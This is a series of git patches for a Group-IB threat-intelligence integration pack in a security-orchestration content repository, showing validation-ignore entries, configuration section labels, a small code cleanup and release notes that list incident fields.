task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in malware/cnc collection - by provided ID. + description: Command performs Group IB event lookup in malware/cnc collection by provided ID. id: bffdb353-f903-4e5a-8a8a-1206a8b08230 iscommand: true name: gibtia-get-malware-cnc-info @@ -625,6 +613,7 @@ tasks: name: Done type: title version: -1 + description: '' taskid: 5a806a99-0da7-4bb9-8507-1c9851220a7e timertriggers: [] type: title @@ -1250,8 +1239,7 @@ tasks: skipunavailable: false task: brand: "" - description: Checks that suspicious_ip/tor_node collection available for the - client. + description: Checks that suspicious_ip/tor_node collection available for the client. id: 83e372d2-713d-428e-8663-83d71df66f5e iscommand: false name: Is suspicious_ip/tor_node collection available? @@ -1335,8 +1323,7 @@ tasks: skipunavailable: false task: brand: "" - description: Checks that suspicious_ip/open_proxy collection available for the - client. + description: Checks that suspicious_ip/open_proxy collection available for the client. id: e9229b64-131e-4835-8ab7-bd65180cc255 iscommand: false name: Is suspicious_ip/open_proxy collection available? @@ -1420,8 +1407,7 @@ tasks: skipunavailable: false task: brand: "" - description: Checks that suspicious_ip/socks_proxy collection available for - the client. + description: Checks that suspicious_ip/socks_proxy collection available for the client. id: c241afe9-a4ea-4ca6-898f-bca3b504a9be iscommand: false name: Is suspicious_ip/socks_proxy collection available? diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/pack_metadata.json b/Packs/GroupIB_ThreatIntelligenceAttribution/pack_metadata.json index 25bff104cd65..1e6119710590 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/pack_metadata.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/pack_metadata.json @@ -2,7 +2,7 @@ "name": "Group-IB Threat Intelligence", "description": "Group-IB Threat Intelligence is a system for analyzing and attributing cyberattacks, threat hunting, and protecting network infrastructure based on data relating to adversary tactics, tools, and activity. Use this pack to fast receive incidents related to you, attribute them to adversaries to do instant response, enrich your security with an enormous IOCs collection, and provide possibilities for manual investigation through Group-IB data via Cortex XSOAR interface.", "support": "partner", - "currentVersion": "1.4.8", + "currentVersion": "2.0.0", "author": "Group-IB", "url": "https://www.group-ib.com/", "email": "integration@group-ib.com", From 2a9d29d39baecacc48f9c294bba0168864e49e9d Mon Sep 17 00:00:00 2001 From: Amichai Date: Thu, 30 Jan 2025 11:36:06 +0200 Subject: [PATCH 2/9] Skip certain validations --- .../.pack-ignore | 279 +++++++++++++++++- 1 file changed, 276 insertions(+), 3 deletions(-) diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore index 09370649b2ec..82b60a088577 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore @@ -1,12 +1,15 @@ [file:GroupIB_TIA.yml] -ignore=BA108,BA109 +ignore=BA108,BA109,BC104,BC102,ST111,RM110 [file:GroupIB_TIA_Feed.yml] -ignore=BA108,BA109 +ignore=BA108,BA109,IN163,ST111 [file:classifier-Group-IB_Threat_Intelligence_&_Attribution_(mapper).json] ignore=BA101 +[file:classifier-Group-IB_Threat_Intelligence_mapper.json] +ignore=BC113 + [file:GroupIBTIA_image.png] ignore=IM111 @@ -17,4 +20,274 @@ ignore=IM111 ignore=BA101 [file:1_4_1.md] -ignore=RN116 \ No newline at end of file +ignore=RN116 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Country.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_URLs.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Sectors.json] +ignore=IF115 + +[file:incidentfield-GIB_Malware_CNC_Domain.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Date_Registration.json] +ignore=IF115 + +[file:incidentfield-GIB_CVSS_Vector.json] +ignore=IF115 + +[file:incidentfield-GIB_Threat_Actors_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_Extended_CVSS_Exploitability.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Request_Data_Link.json] +ignore=IF115 + +[file:incidentfield-GIB_Cybercriminal_Threat_Actor_Description.json] +ignore=IF115 + +[file:incidentfield-GIB_CPE_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_Cybercriminal_Expertises.json] +ignore=IF115 + +[file:incidentfield-GIB_Link_List_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Duration.json] +ignore=IF115 + +[file:incidentfield-GIB_Organization_BIC.json] +ignore=IF115 + +[file:incidentfield-GIB_Proxy_Source.json] +ignore=IF115 + +[file:incidentfield-GIB_Leak_Published.json] +ignore=IF115 + +[file:incidentfield-GIB_Organization_IBAN.json] +ignore=IF115 + +[file:incidentfield-GIB_Matches_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_OSI_Git_Repository_Files_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_Scanner_Categories.json] +ignore=IF115 + +[file:incidentfield-GIB_Merged_Cvss.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_Registrar.json] +ignore=IF115 + +[file:incidentfield-GIB_Organization_Name.json] +ignore=IF115 + +[file:incidentfield-GIB_Parsed_Login_Domain.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Target_Provider.json] +ignore=IF115 + +[file:incidentfield-GIB_Proxy_Type.json] +ignore=IF115 + +[file:incidentfield-GIB_Malware_Langs.json] +ignore=IF115 + +[file:incidentfield-GIB_Date_Last_Seen.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Source.json] +ignore=IF115 + +[file:incidentfield-GIB_Service_URL.json] +ignore=IF115 + +[file:incidentfield-GIB_Deface_Contacts.json] +ignore=IF115 + +[file:incidentfield-GIB_Deface_Date.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Regions.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Labels.json] +ignore=IF115 + +[file:incidentfield-GIB_Emails.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_Domain_Expiration_Date.json] +ignore=IF115 + +[file:incidentfield-GIB_Has_Exploit.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Malware.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_Sources.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Sectors.json] +ignore=IF115 + +[file:incidentfield-GIB_Deface_Source.json] +ignore=IF115 + +[file:incidentfield-GIB_Service_IP.json] +ignore=IF115 + +[file:incidentfield-GIB_Reporter.json] +ignore=IF115 + +[file:incidentfield-GIB_Compromised_Events_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_Cybercriminal_Threat_Actor_Report_Authors.json] +ignore=IF115 + +[file:incidentfield-GIB_Compromised_Account.json] +ignore=IF115 + +[file:incidentfield-GIB_Cybercriminal_Threat_Actor_Aliases.json] +ignore=IF115 + +[file:incidentfield-GIB_Malware_Aliases.json] +ignore=IF115 + +[file:incidentfield-GIB_CVSS_Score.json] +ignore=IF115 + +[file:incidentfield-GIB_Deface_Site_URL.json] +ignore=IF115 + +[file:incidentfield-GIB_Threat_Level.json] +ignore=IF115 + +[file:incidentfield-GIB_VPN_Names.json] +ignore=IF115 + +[file:incidentfield-GIB_Service_Domain.json] +ignore=IF115 + +[file:incidentfield-GIB_Update_Time.json] +ignore=IF115 + +[file:incidentfield-GIB_Extended_CVSS_Base.json] +ignore=IF115 + +[file:incidentfield-GIB_Malware_Categories.json] +ignore=IF115 + +[file:incidentfield-GIB_Cybercriminal_Malware.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_Kit_Path.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Target_Country_Code.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Target_IP.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Countries.json] +ignore=IF115 + +[file:incidentfield-GIB_Extended_CVSS_Overall.json] +ignore=IF115 + +[file:incidentfield-GIB_Cybercriminal_Sectors.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Protocol.json] +ignore=IF115 + +[file:incidentfield-GIB_CNC_Domain.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Aliases.json] +ignore=IF115 + +[file:incidentfield-GIB_Nation-State_Cybercriminal_Forums_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Target_City.json] +ignore=IF115 + +[file:incidentfield-GIB_Report_Number.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_Domain_Puny.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Target_URL.json] +ignore=IF115 + +[file:incidentfield-GIB_Target_Domain_Provider.json] +ignore=IF115 + +[file:incidentfield-GIB_Date_Created_At.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Request_Body_Hash.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Target_Region.json] +ignore=IF115 + +[file:incidentfield-GIB_DDOS_Request_Headers_Body.json] +ignore=IF115 + +[file:incidentfield-GIB_Organization_SWIFT.json] +ignore=IF115 + +[file:incidentfield-GIB_Affected_Software_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_Malware_Source_Countries.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_Brand.json] +ignore=IF115 + +[file:incidentfield-GIB_Phishing_Date_Added.json] +ignore=IF115 + +[file:incidentfield-GIB_Malware_File_hash.json] +ignore=IF115 + +[file:incidentfield-GIB_Downloaded_From_Table.json] +ignore=IF115 + +[file:incidentfield-GIB_Date_Updated_At.json] +ignore=GR103 + +[file:incidentfield-GIB_Scanner_Sources.json] +ignore=BA116 + +[file:incidentfield-GIB_Phishing_Date_Updated.json] +ignore=BA116 + +[file:layoutscontainer-GIB_OSI_Git_Leak_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_OSI_Public_Leak_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Compromised_Mule_Layout.json] +ignore=LO107 \ No newline at end of file From 723d92d2ca59193c233ec00f279b01a7386a8808 Mon Sep 17 00:00:00 2001 From: Amichai Date: Thu, 30 Jan 2025 11:58:53 +0200 Subject: [PATCH 3/9] Various fixes --- .../.pack-ignore | 71 +++++++++++++++++-- .../Integrations/GroupIBTIA/GroupIBTIA.yml | 15 +++- .../GroupIBTIA/GroupIBTIA_test.py | 1 + .../GroupIB_TIA_Feed/GroupIB_TIA_Feed.py | 2 +- .../GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml | 19 +++++ 5 files changed, 101 insertions(+), 7 deletions(-) diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore index 82b60a088577..43743e9609fe 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore @@ -2,14 +2,11 @@ ignore=BA108,BA109,BC104,BC102,ST111,RM110 [file:GroupIB_TIA_Feed.yml] -ignore=BA108,BA109,IN163,ST111 +ignore=BA108,BA109 [file:classifier-Group-IB_Threat_Intelligence_&_Attribution_(mapper).json] ignore=BA101 -[file:classifier-Group-IB_Threat_Intelligence_mapper.json] -ignore=BC113 - [file:GroupIBTIA_image.png] ignore=IM111 @@ -290,4 +287,68 @@ ignore=LO107 ignore=LO107 [file:layoutscontainer-GIB_Compromised_Mule_Layout.json] -ignore=LO107 \ No newline at end of file +ignore=LO107 + +[file:layoutscontainer-GIB_Attacks_Phishing_Group_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Compromised_Card_Group_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Nation-State_Cybercriminals_Threat_Layout.json] +ignore=LO107 + + +[file:layoutscontainer-GIB_Cybercriminal_Threat_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Suspicious_IP_Open_Proxy_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Attacks_Deface_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Nation-State_Cybercriminals_Threat_Actor_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Suspicious_IP_Socks_Proxy_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_APT_Threat_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Data_Breach_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Compromised_Account_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Suspicious_IP_VPN_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_OSI_Vulnerability_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Attacks_Phishing_Kit_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Cybercriminal_Threat_Actor_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Compromised_Card_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Malware_CNC_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Malware_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Suspicious_IP_TOR_Node_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Suspicious_IP_Scanner_Layout.json] +ignore=LO107 + +[file:layoutscontainer-GIB_Attacks_DDOS_Layout.json] +ignore=LO107 diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.yml b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.yml index f2464006d9ab..f68d0a6dea87 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.yml +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.yml @@ -1,4 +1,7 @@ category: Data Enrichment & Threat Intelligence +sectionOrder: +- Connect +- Collect commonfields: id: Group-IB Threat Intelligence & Attribution version: -1 @@ -9,27 +12,33 @@ configuration: name: url required: true type: 0 + section: Connect - additionalinfo: The API Key and Username required to authenticate to the service. display: Username name: credentials required: true type: 9 + section: Connect - additionalinfo: Whether to allow connections without verifying SSL certificates validity. display: Trust any certificate (not secure) name: insecure required: false type: 8 + section: Connect - additionalinfo: Whether to use XSOAR system proxy settings to connect to the API. display: Use system proxy settings name: proxy required: false type: 8 + section: Connect - display: Fetch incidents name: isFetch required: false type: 8 + section: Collect - additionalinfo: Type(s) of incidents to fetch from the third party API. - display: Colletions to fetch + display: Collections to fetch + section: Collect hidden: false name: incident_collections options: @@ -59,6 +68,7 @@ configuration: type: 16 - additionalinfo: Date to start fetching incidents from. defaultvalue: 3 days + section: Collect display: Incidents first fetch hidden: false name: first_fetch @@ -66,6 +76,7 @@ configuration: type: 0 - additionalinfo: A number of requests per collection that integration sends in one fetch iteration (each request picks up to 200 incidents). If you face some runtime errors, lower the value. defaultvalue: '3' + section: Collect display: Number of requests per collection hidden: false name: max_fetch @@ -79,10 +90,12 @@ configuration: type: 15 - display: Incident type name: incidentType + section: Collect required: false type: 13 - display: Hunting Rules name: hunting_rules + section: Collect defaultvalue: "false" type: 8 required: false diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py index 38558fd82581..e40dad6752f3 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py @@ -51,6 +51,7 @@ "compromised/breached" ] + @pytest.fixture(scope="function", params=COLLECTION_NAMES) def session_fixture(request): """ diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.py b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.py index 9b8c283e3874..0379ecae1514 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.py +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.py @@ -1245,7 +1245,7 @@ def validate_launch_get_indicators_command(limit, collection_name): except ValueError: raise Exception("A limit should be a number, not a string.") - if collection_name not in COMMON_MAPPING.keys(): + if collection_name not in COMMON_MAPPING: raise Exception( "Incorrect collection name. Please, choose one of the displayed options." ) diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml index 180a4751c1c9..7536a7415422 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml @@ -1,4 +1,7 @@ category: Data Enrichment & Threat Intelligence +sectionOrder: +- Connect +- Collect commonfields: id: Group-IB Threat Intelligence & Attribution Feed version: -1 @@ -9,21 +12,25 @@ configuration: name: url required: true type: 0 + section: Connect - additionalinfo: The API Key and Username required to authenticate to the service. display: Username name: credentials required: true type: 9 + section: Connect - additionalinfo: Whether to allow connections without verifying SSL certificates validity. display: Trust any certificate (not secure) name: insecure type: 8 required: false + section: Connect - additionalinfo: Whether to use XSOAR system proxy settings to connect to the API. display: Use system proxy settings name: proxy type: 8 required: false + section: Connect - additionalinfo: Incremental feeds pull only new or modified indicators that have been sent from the integration. The determination if the indicator is new or modified happens on the 3rd-party vendor's side, so only indicators that are new or modified are sent to Cortex XSOAR. Therefore, all indicators coming from these feeds are labeled new or modified. defaultvalue: 'true' display: Incremental feed @@ -31,11 +38,13 @@ configuration: name: feedIncremental type: 8 required: false + section: Collect - defaultvalue: 'true' display: Fetch indicators name: feed type: 8 required: false + section: Collect - additionalinfo: Indicators from this integration instance will be marked with this reputation defaultvalue: Suspicious display: Indicator Reputation @@ -47,6 +56,7 @@ configuration: - Bad type: 18 required: false + section: Collect - additionalinfo: Reliability of the source providing the intelligence data defaultvalue: A - Completely reliable display: Source Reliability @@ -60,16 +70,19 @@ configuration: - F - Reliability cannot be judged required: true type: 15 + section: Collect - defaultvalue: '1' display: Feed Fetch Interval name: feedFetchInterval type: 19 required: false + section: Collect - additionalinfo: When selected, the exclusion list is ignored for indicators from this feed. This means that if an indicator from this feed is on the exclusion list, the indicator might still be added to the system. display: Bypass exclusion list name: feedBypassExclusionList type: 8 required: false + section: Collect - additionalinfo: Collections List to include for fetching. display: Indicator collections name: indicator_collections @@ -95,6 +108,7 @@ configuration: type: 16 required: false hidden: false + section: Collect - additionalinfo: Date to start fetching indicators from. defaultvalue: 3 days display: Indicator first fetch @@ -102,9 +116,11 @@ configuration: type: 0 required: false hidden: false + section: Collect - additionalinfo: A number of requests per collection that integration sends in one fetch iteration (each request picks up to 200 objects with different amount of indicators). If you face some runtime errors, lower the value. defaultvalue: '2' display: Number of requests per collection + section: Collect name: requests_count options: - '1' @@ -117,12 +133,14 @@ configuration: hidden: false - additionalinfo: Supports CSV values. display: Tags + section: Collect name: feedTags type: 0 required: false - additionalinfo: The Traffic Light Protocol (TLP) designation to apply to indicators fetched from the feed display: Traffic Light Protocol Color name: tlp_color + section: Collect options: - RED - AMBER @@ -133,6 +151,7 @@ configuration: - display: '' name: feedExpirationPolicy type: 17 + section: Collect options: - never - interval From 56a34b4be9faddaf0063afc0a90f1a3c65f96a63 Mon Sep 17 00:00:00 2001 From: Amichai Date: Thu, 30 Jan 2025 12:25:00 +0200 Subject: [PATCH 4/9] RNs redo --- .../GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml | 2 +- .../ReleaseNotes/2_0_0.md | 885 +++++++----------- 2 files changed, 335 insertions(+), 552 deletions(-) diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml index 7536a7415422..58bd29bdaaa5 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/GroupIB_TIA_Feed.yml @@ -156,11 +156,11 @@ configuration: - never - interval - indicatorType - - suddenDeath - display: '' name: feedExpirationInterval type: 1 required: false + section: Collect description: Use Group-IB Threat Intelligence Feed integration to fetch IOCs from various Group-IB collections. display: Group-IB Threat Intelligence Feed name: Group-IB Threat Intelligence & Attribution Feed diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md index 917ce431a716..dfe89d9f6364 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md @@ -7,614 +7,397 @@ #### Incident Fields -- Added new incident fields for new and old collections and also changed old incident fields related to old collections - -##### GIB Address - -##### New: GIB Cybercriminal Forums Table - -##### GIB Downloaded From - -##### New: GIB Nation-State Cybercriminals Expertises - -##### New: GIB Merged Cvss - -##### New: GIB Nation-State Cybercriminals Threat Actor Aliases - -##### New: GIB Malware Platforms - -##### New: GIB Leak Published - -##### New: GIB Report Number - -##### New: GIB Provider Domain - -##### New: GIB CPE Table - -##### New: GIB Socks Proxy Source - -##### New: GIB Target Provider - -##### New: GIB Cybercriminal Sectors - -##### New: GIB Nation-State Cybercriminals Regions - -##### New: GIB Nation-State Cybercriminals Threat Title - -##### New: GIB Date Add - -##### GIB Leaked File Name - -##### New: GIB Date First Compromised - -##### New: GIB Compromised Events Information Table - -##### New: GIB Cybercriminal Threat Title - -##### New: GIB Nation-State Cybercriminals Threat Actor Reports Table - -##### New: GIB DDOS Date End - -##### New: GIB Cybercriminal Threat Actor Report Authors - -##### New: GIB Organization IBAN - -##### New: GIB Mirror Link - -##### GIB ID - -##### New: GIB Deface Date - -##### New: GIB DDOS Request Body - -##### GIB Card Number - -##### New: GIB Email Domains - -##### New: GIB DDOS Target City - -##### GIB Phishing Date Blocked - -##### GIB Date of Detection - -##### New: GIB Organization BSB - -##### New: GIB Malware Description - -##### New: GIB Phishing URLs - -##### New: GIB Nation-State Cybercriminals Threat Regions - -##### New: GIB Nation-State Cybercriminals Threat Actor Country - -##### New: GIB Target IP - -##### New: GIB Threat Level - -##### New: GIB Country Name - -##### New: GIB Organization CLABE - -##### New: GIB Date Last Compromised - -##### New: GIB Extended CVSS Base - -##### New: GIB Vulnerability Type - -##### New: GIB Proxy Port - -##### New: GIB Date Last Seen - -##### New: GIB Phishing Kit Path - -##### GIB Severity - -##### New: GIB DDOS Target Domain - -##### New: GIB Organization SWIFT - -##### New: GIB Malware Aliases - -##### GIB Drop Email - -##### New: GIB Target ASN - -##### New: GIB Extended CVSS Temporal - -##### New: GIB Downloaded From Table - -##### New: GIB Nation-State Cybercriminals Threat Actor Roles - -##### New: GIB Date Updated At - -##### New: GIB Malware Regions - -##### GIB Drop Email Domain - -##### New: GIB VPN Sources - -##### GIB Malware Name - -##### New: GIB Link List Table - -##### New: CPE Table - -##### GIB Favicon - -##### GIB Person - -##### New: GIB Affected Software Table - -##### New: GIB CVSS Vector - -##### New: GIB Passwords - -##### GIB Date Compromised - -##### GIB Leak Name - -##### New: GIB DDOS Request Headers Body - -##### New: GIB Emails - -##### GIB Compromised Login - -##### GIB Related Indicators Data - -##### New: GIB Organization Name - -##### New: GIB Malware Table - -##### New: GIB DDOS Date Begin - -##### GIB CVV - -##### New: GIB Nation-State Cybercriminals Threat Langs - -##### GIB Admiralty Code - -##### New: GIB DDOS Target URL - -##### New: GIB DDOS Target Provider - -##### New: GIB Proxy Source - -##### New: GIB Extended CVSS Overall - -##### GIB Phishing Type - -##### New: GIB Malware Short Description - -##### New: GIB Nation-State Cybercriminals Threat Description - -##### GIB Email - -##### New: GIB Parsed Login Domain - -##### GIB Inject Dump - -##### New: GIB Cybercriminal Threat Description - -##### New: GIB CNC Port - -##### New: GIB Service IP - -##### GIB Leaked Data - -##### New: GIB Phishing Kit Email - -##### New: GIB Is Tailored - -##### New: GIB Target Domain Provider - -##### New: GIB Extended Description - -##### New: GIB Upload Time - -##### New: GIB Malware File hash - -##### New: GIB Nation-State Cybercriminals Threat Actor Labels - -##### New: GIB DDOS Target Country Code - -##### New: GIB Matches Table - -##### New: GIB Phishing IP Table - -##### New: GIB DDOS Request Headers Hash - -##### GIB Password - -##### New: GIB DDOS Protocol - -##### New: GIB DDOS Date Registration - -##### New: GIB Cybercriminal Regions - -##### New: GIB Proxy Type - -##### GIB Phishing Kit Emails - -##### GIB Source - -##### GIB Phishing Status - -##### New: GIB DDOS Target Port - -##### New: GIB Malware Langs - -##### New: GIB Service URL - -##### New: GIB Nation-State Cybercriminals Threat Expertises - -##### New: GIB Deface Source - -##### New: GIB Nation-State Cybercriminals Malware - -##### GIB Name Servers - -##### New: GIB Country Code - -##### New: GIB Bulletin Family - -##### New: GIB Deface Site URL - -##### New: GIB Has Exploit - -##### GIB Reliability - -##### New: GIB Nation-State Cybercriminals Threat Actor Description - -##### New: GIB Target Region - -##### New: GIB Phishing Domain Puny - -##### New: GIB Nation-State Cybercriminals Threat Report Number - -##### New: GIB Phishing Objectives - -##### New: GIB Phishing Sources - -##### New: GIB Date Modified - -##### New: GIB DDOS Target Category - -##### New: GIB Cybercriminal Threat Actor Aliases - -##### New: GIB Service Domain - -##### GIB Title - -##### New: GIB Phishing Registrar - -##### GIB Card Issuer - -##### New: GIB Cybercriminal Expertises - -##### New: GIB Nation-State Cybercriminals Sectors - -##### New: GIB GIT Source - -##### GIB Threat Actor is APT - -##### New: GIB DDOS Target IP - -##### New: GIB Nation-State Cybercriminals Threat Actor CVE - -##### New: GIB DDOS Request Body Hash - -##### New: GIB CNC URL - -##### New: GIB Compromised Events Table - -##### New: GIB Extended CVSS Exploitability - -##### New: GIB Threat Actors Table - -##### New: GIB Nation-State Cybercriminals Threat Sectors - -##### New: GIB Organization BIC - -##### GIB Inject MD5 - -##### New: GIB Target City - -##### New: GIB DDOS Type - -##### GIB Date Created - -##### New: GIB Phishing Date Updated - -##### New: GIB Date First Seen - -##### New: GIB Date Published - -##### New: GIB Malware Categories - -##### New: GIB DDOS Target Region - -##### New: GIB DDOS Source - -##### New: GIB VPN Names - -##### New: GIB Cybercriminal Malware - -##### New: GIB Extended CVSS Impact - -##### GIB Payment System - -##### New: GIB Phishing Domain Expiration Date - -##### GIB Victim IP - -##### GIB Repository - -##### New: GIB DDOS Duration - -##### New: GIB DDOS Target Country Name - -##### New: GIB Phishing Kit Table - -##### New: GIB Reporter - -##### GIB Phishing Kit Hash - -##### New: GIB Date Created At - -##### New: GIB Phishing Kit Source - -##### New: GIB Nation-State Cybercriminal Forums Table - -##### GIB Threat Actor ID - -##### GIB Credibility - -##### New: GIB Nation-State Cybercriminals Threat Countries - -##### New: GIB Cybercriminal Threat Actor Description - -##### New: GIB Parsed Login IP - -##### New: GIB Phishing Date Detected - -##### GIB Card Type - -##### GIB Threat Actor Name - -##### GIB Target Brand - -##### New: GIB Deface Contacts - -##### New: GIB Proxy Sources - -##### New: GIB Phishing Brand - -##### New: GIB Threat Actor Country - -##### New: GIB Scanner Categories - -##### New: GIB Nation-State Cybercriminals Threat Actor Goals - -##### New: GIB Cybercriminal Threat Actor Reports Table - -##### New: GIB Malware CNC Domain - -##### GIB HTML - -##### New: GIB CNC - -##### New: GIB DDOS Target ASN - -##### GIB Screenshot - -##### GIB Phishing Domain - -##### New: GIB Href - -##### New: GIB OSI Git Repository Files Table - -##### New: GIB Malware Source Countries - -##### GIB Card Valid Thru - -##### New: GIB Scanner Sources - -##### New: GIB Phishing Date Added - -##### GIB Target Category - -##### New: GIB CVSS Score - -##### GIB Date Expired - -##### New: GIB Compromised Account - -##### New: GIB DDOS Request Data Link - -##### New: GIB CNC Domain - -##### New: GIB Date Incident - -##### GIB Portal Link - -##### GIB Target Domain - -##### New: GIB Update Time - -##### GIB Data Hash - +- New: **GIB Target ASN** +- **GIB Related Indicators Data** +- **GIB Inject Dump** +- New: **GIB Organization SWIFT** +- New: **GIB Update Time** +- **GIB Name Servers** +- **GIB Portal Link** +- **GIB Source** +- New: **GIB DDOS Target URL** +- New: **GIB Proxy Source** +- New: **GIB Reporter** +- New: **GIB CNC Domain** +- New: **GIB Phishing Brand** +- **GIB Card Valid Thru** +- New: **GIB Compromised Account** +- **GIB Payment System** +- New: **GIB Phishing Date Added** +- New: **GIB Report Number** +- New: **GIB Email Domains** +- New: **GIB Nation-State Cybercriminals Sectors** +- New: **GIB Malware Langs** +- New: **GIB Target IP** +- New: **GIB Date Modified** +- New: **GIB GIT Source** +- New: **GIB Deface Date** +- New: **GIB Cybercriminal Regions** +- New: **GIB DDOS Request Body Hash** +- New: **GIB CNC** +- New: **GIB DDOS Request Body** +- New: **GIB Nation-State Cybercriminals Threat Actor CVE** +- **GIB Date of Detection** +- **GIB Phishing Date Blocked** +- New: **GIB Phishing Registrar** +- New: **GIB DDOS Request Data Link** +- New: **GIB Nation-State Cybercriminals 